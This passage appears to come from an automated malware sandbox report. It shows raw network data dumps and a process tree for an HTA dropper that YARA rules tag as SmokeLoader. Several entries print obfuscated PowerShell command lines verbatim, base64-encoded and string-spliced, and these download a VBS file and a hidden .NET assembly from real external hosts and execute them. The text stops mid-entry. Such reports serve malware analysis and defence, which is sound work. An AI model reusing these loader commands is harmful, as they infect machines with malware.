                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: 84 f0 b8 1e 38 76 4c fe 64 80 f2 d8 64 91 11 58 94 01 ae 81 cb 19 50 2b 2c 67 69 23 93 80 2d 58 52 a6 9c 1f 7f 86 66 1d 1d 9d ea bc 83 7d 73 58 40 8d a5 66 0b 76 7d 47 f5 ca 26 c7 8c 00 08 6c 0c e9 a2 7d a5 89 da aa 39 38 b8 96 17 50 c9 ea 03 82 73 48 2a 89 7c a6 b3 b8 1e 09 ed 99 b3 7d da 09 8c 01 42 1b fa 1c 0b ba 24 cb b4 8d ca 45 10 30 fe 1b a3 d1 e8 61 91 84 0c 4b 1e 2f 11 96 55 82 45 04 b0 07 fc 38 d3 ea 01 41 6e 18 01 7c 9a c0 68 bc 45 b7 1a 15 c5 7b 65 a2 d4 04 63 74 c0 f6 1d b3 ce 1d 54 81 da f6 f9 7b ac 35 e3 e9 31 7d 2e fa 3c 9e 08 f6 c0 d9 97 56 86 12 80 1d c4 fe 98 21 b1 95 81 1b 7d f9 cc bd 33 ec 60 f2 16 66 e6 af 18 32 a9 52 24 46 65 f7 5e 30 2d 22 33 31 55 a0 7b 5e 02 5d 14 2f 3a 4e d6 1d 78 f6 c7 06 a3 49 ba 34 24 af 14 09 e0 e2 5a f9 03
                                                                                                                                                                                                                            Data Ascii: 8vLddXP+,gi#-XRf}sX@fv}G&l}98PsH*|}B$E0aK/UE8An|hE{ectT{51}.<V!}3`f2R$Fe^0-"31U{^]/:NxI4$Z
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: 2d 1a fe 99 63 aa 8d c1 56 4d b1 88 c2 85 dc 6c 8d e1 bf 3a bc 0b 18 1c d7 98 51 4e e6 46 b6 a0 0a 80 49 bf 91 ed d7 2a f1 d3 aa 89 e3 f2 ca d8 76 63 b4 8b 22 ea b7 75 1e df a6 5b ef ec ab 13 ef 62 e8 ce 02 86 e5 54 80 3a d7 5e bc fc 32 1f 5e 5b 50 1d bc dd bb 36 13 e6 5b 91 77 7b 88 eb 7f 0c 01 3e 95 81 62 ce 81 57 69 df c9 0d 62 c5 71 7d 31 76 52 8c 57 8b 06 ac 1b 07 e4 71 93 a9 2d 2b 3d b8 b0 a0 53 d1 a0 28 59 ae 78 eb 8a c8 db dc b5 01 66 e8 60 42 b1 53 db eb 8c 0d 58 1a 72 a0 11 26 e5 20 8f 86 29 59 60 0d f0 09 af 6c 07 91 fc c8 42 31 a5 2b ea 3d ee ce 74 92 9f dd b0 ad aa 45 f3 c9 ae f8 b8 67 0a 77 21 3e dc 64 32 32 a8 a4 60 7a f2 0e 07 3c 8e cc c1 d8 8b 37 59 42 f6 e4 9e 87 82 3e 19 c4 33 35 01 cf b6 0e b0 24 d5 9a e9 86 64 8d 61 1c fa c8 bc 0f 17
                                                                                                                                                                                                                            Data Ascii: -cVMl:QNFI*vc"u[bT:^2^[P6[w{>bWibq}1vRWq-+=S(Yxf`BSXr& )Y`lB1+=tEgw!>d22`z<7YB>35$da
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: b6 37 3c 0e 2f df 01 dd 73 01 10 00 a8 07 af ca b8 c8 48 d1 b6 85 0a 48 27 a7 d3 32 e5 97 cd 51 e6 3b 32 dd b0 1d 87 ab 02 de 27 24 5b 44 55 43 d5 cf b9 e7 03 74 2a aa 95 63 6a a7 f2 c2 a3 23 46 50 6e da 07 f1 66 76 9b c4 7c ed 31 92 4b 56 e7 81 d0 e1 d3 58 8f 28 2a db 81 2d 75 80 d9 58 d0 2a d1 db d8 0e d9 49 65 81 94 24 85 95 6f 83 ee 70 32 ea d2 2d ab 4c 4b 1b b2 6a ab 9c c5 d6 6a 53 57 3a b0 bd 8b 64 d7 bd fb e0 6e 18 a0 a0 6d 8f 73 5f fb 61 20 f2 a3 06 81 3d f9 cc f3 ab 48 36 69 82 ee 3b 40 06 e8 1b f7 3f 4c 13 eb 80 89 dc ae d9 15 b6 95 bb ba f6 c0 d9 65 8d ad e3 34 73 3d d2 29 26 20 8b 6e f8 01 e2 05 a3 42 b1 b3 16 52 6a e8 81 5e ff 00 3c e4 d4 00 c7 85 32 16 02 83 7b fb 9c 03 0d 24 28 c6 e9 80 f7 ed 78 bc fa 18 8c ca e7 71 17 54 b9 0f ac 1b 83 14
                                                                                                                                                                                                                            Data Ascii: 7</sHH'2Q;2'$[DUCt*cj#FPnfv|1KVX(*-uX*Ie$op2-LKjjSW:dnms_a =H6i;@?Le4s=)& nBRj^<2{$(xqT
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: 59 65 1f bb 65 16 2d 8f 40 2f 0f 13 b2 4f 20 3b 5a 36 20 a8 03 f0 e5 a7 4d 3b 15 69 54 b1 07 8e 4d 7e 58 08 eb e7 75 68 a5 89 9b a1 04 0e 99 68 e6 f3 16 37 da 49 27 d4 6f a6 76 aa 54 dc ca 16 a8 75 ed 58 1d 3d 2b 02 41 da c3 70 38 0e 86 0a d5 64 8a ae 7b 62 fa bd 26 9d 50 01 e8 76 3c 5f ce b0 e8 51 99 49 1d 3a de 2d aa 85 4b aa bb 82 cd b8 86 07 e3 60 60 02 28 0a c6 c5 18 6f 3c 02 46 1e 0f bd 2d b0 95 57 8f 51 61 75 f2 c0 2b 6d 50 a5 85 8e 06 14 ca ef b6 48 d3 cc 45 e1 80 ef 80 be a1 c6 f2 44 cd 23 7f 13 55 0c b8 87 ef 30 6f f3 37 3a fe 36 6f e1 15 c0 fd 31 80 cb 3e 95 d9 90 96 e6 d4 59 2b 5f 4c 8d 3e 9b cc 88 c6 d1 b2 8e 08 23 f8 8f 3c 1f cf 01 38 b4 92 ca 8d 22 ad c6 ad 4c c0 74 fa 63 92 f8 7c 91 42 25 56 5f 34 1b 35 c5 8f ae 37 16 89 3c b3 e5 93 1d d6
                                                                                                                                                                                                                            Data Ascii: Yee-@/O ;Z6 M;iTM~Xuhh7I'ovTuX=+Ap8d{b&Pv<_QI:-K``(o<F-WQau+mPHED#U0o7:6o1>Y+_L>#<8"Ltc|B%V_457<
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: da 4a 89 99 cb 2b 75 da 3a 1b 38 02 11 fd 2b 16 d2 3b 86 c7 c8 6d 56 e4 6b dc 3a 73 f0 cc e2 a5 1b 69 5d ac 0f 52 70 19 87 4e 62 60 d6 08 3c df b6 5e 59 91 66 13 8a ae 85 7e 38 00 ee b1 96 00 a8 3d ba de 14 b2 ea 08 25 02 80 a0 0d bf cf 00 b1 29 d4 28 99 81 dc 5a c5 74 19 b5 11 66 8a eb d5 54 05 d6 62 a4 ab 0c 24 00 59 41 eb 7c fe 58 f6 9b 5d 14 90 96 16 a0 76 f7 c0 6e 68 d0 1d c4 fa ea 82 d5 de 79 fd 6c 32 b6 a5 89 00 9f 6f 6f 86 69 b6 a1 8c bb de cb 11 42 bb 0c 09 65 72 50 de f1 cd 9e b8 06 f0 d8 a2 68 e3 47 3e a1 7b 8e 06 78 55 1c ed ad a0 9e 3d f0 70 bb 69 75 25 94 1d b6 3a e3 be 22 bb 22 12 a8 52 cd db be 02 10 0f 2e 46 2e 40 04 8e 0e 6c 31 41 08 75 a2 2b 9f 86 64 40 06 ab d1 2f a5 af bf cb 1d 87 f7 7f b9 0f 6b da fa 1c 05 25 77 9a 62 a4 12 28 f2 38
                                                                                                                                                                                                                            Data Ascii: J+u:8+;mVk:si]RpNb`<^Yf~8=%)(ZtfTb$YA|X]vnhyl2ooiBerPhG>{xU=piu%:""R.F.@l1Au+d@/k%wb(8
                                                                                                                                                                                                                            2024-11-18 17:37:26 UTC8192INData Raw: a4 ed 37 b6 db a8 bc 0b 48 fe 74 ea cd b8 0d 8a a4 81 67 d2 a0 74 fa 65 b5 33 99 ac 91 cb 4a f2 13 5f e2 af ed 95 43 e6 b1 34 14 01 6c cc 49 00 74 ec 2f 2c d0 10 cc 19 91 6a ad bd 55 64 58 1f 90 c0 34 2c 16 25 76 65 1b 21 78 c7 a9 4f e2 0d da ef f8 bd b2 af 3a b4 6f 45 b7 49 1a c6 41 1c 0d a5 45 83 7c fe 1f 6c 08 57 59 4c 3b 6d f7 6d f9 1e 9e df 2c b8 08 b0 c6 41 52 59 d8 16 2d c5 00 2b b5 fb e0 19 f5 8c d2 bb 38 a5 64 da 49 50 d4 4b 6e 3c 1e 3a de 2f 2c de 64 52 2d 13 b9 94 82 00 1c 28 23 a0 f9 e4 59 95 ca aa 96 a2 05 8b 3d fe 23 f9 e1 b4 eb 10 59 84 b2 aa 3a a8 d8 39 a2 d6 2f a0 f6 be e3 9c 00 49 21 97 51 23 10 55 5d f7 11 ed c9 fe f9 64 90 a2 c2 42 8d e9 21 72 48 ab e8 47 f2 39 3b 90 91 7b ac 9e 7e 1f 2c 63 4e 9e 63 0d d1 17 24 f0 c5 88 51 b7 d4 db a8
                                                                                                                                                                                                                            Data Ascii: 7Htgte3J_C4lIt/,jUdX4,%ve!xO:oEIAE|lWYL;mm,ARY-+8dIPKn<:/,dR-(#Y=#Y:9/I!Q#U]dB!rHG9;{~,cNc$Q


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:12:37:10
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta"
                                                                                                                                                                                                                            Imagebase:0x7c0000
                                                                                                                                                                                                                            File size:13'312 bytes
                                                                                                                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:12:37:11
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:12:37:11
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:12:37:12
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:12:37:15
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"
                                                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                                                            File size:2'141'552 bytes
                                                                                                                                                                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:12:37:16
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"
                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                            File size:46'832 bytes
                                                                                                                                                                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:12:37:20
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
                                                                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:12:37:21
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:12:37:21
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:12:37:21
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:12:37:41
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                                                                                            Imagebase:0x890000
                                                                                                                                                                                                                            File size:56'368 bytes
                                                                                                                                                                                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:12:37:46
                                                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
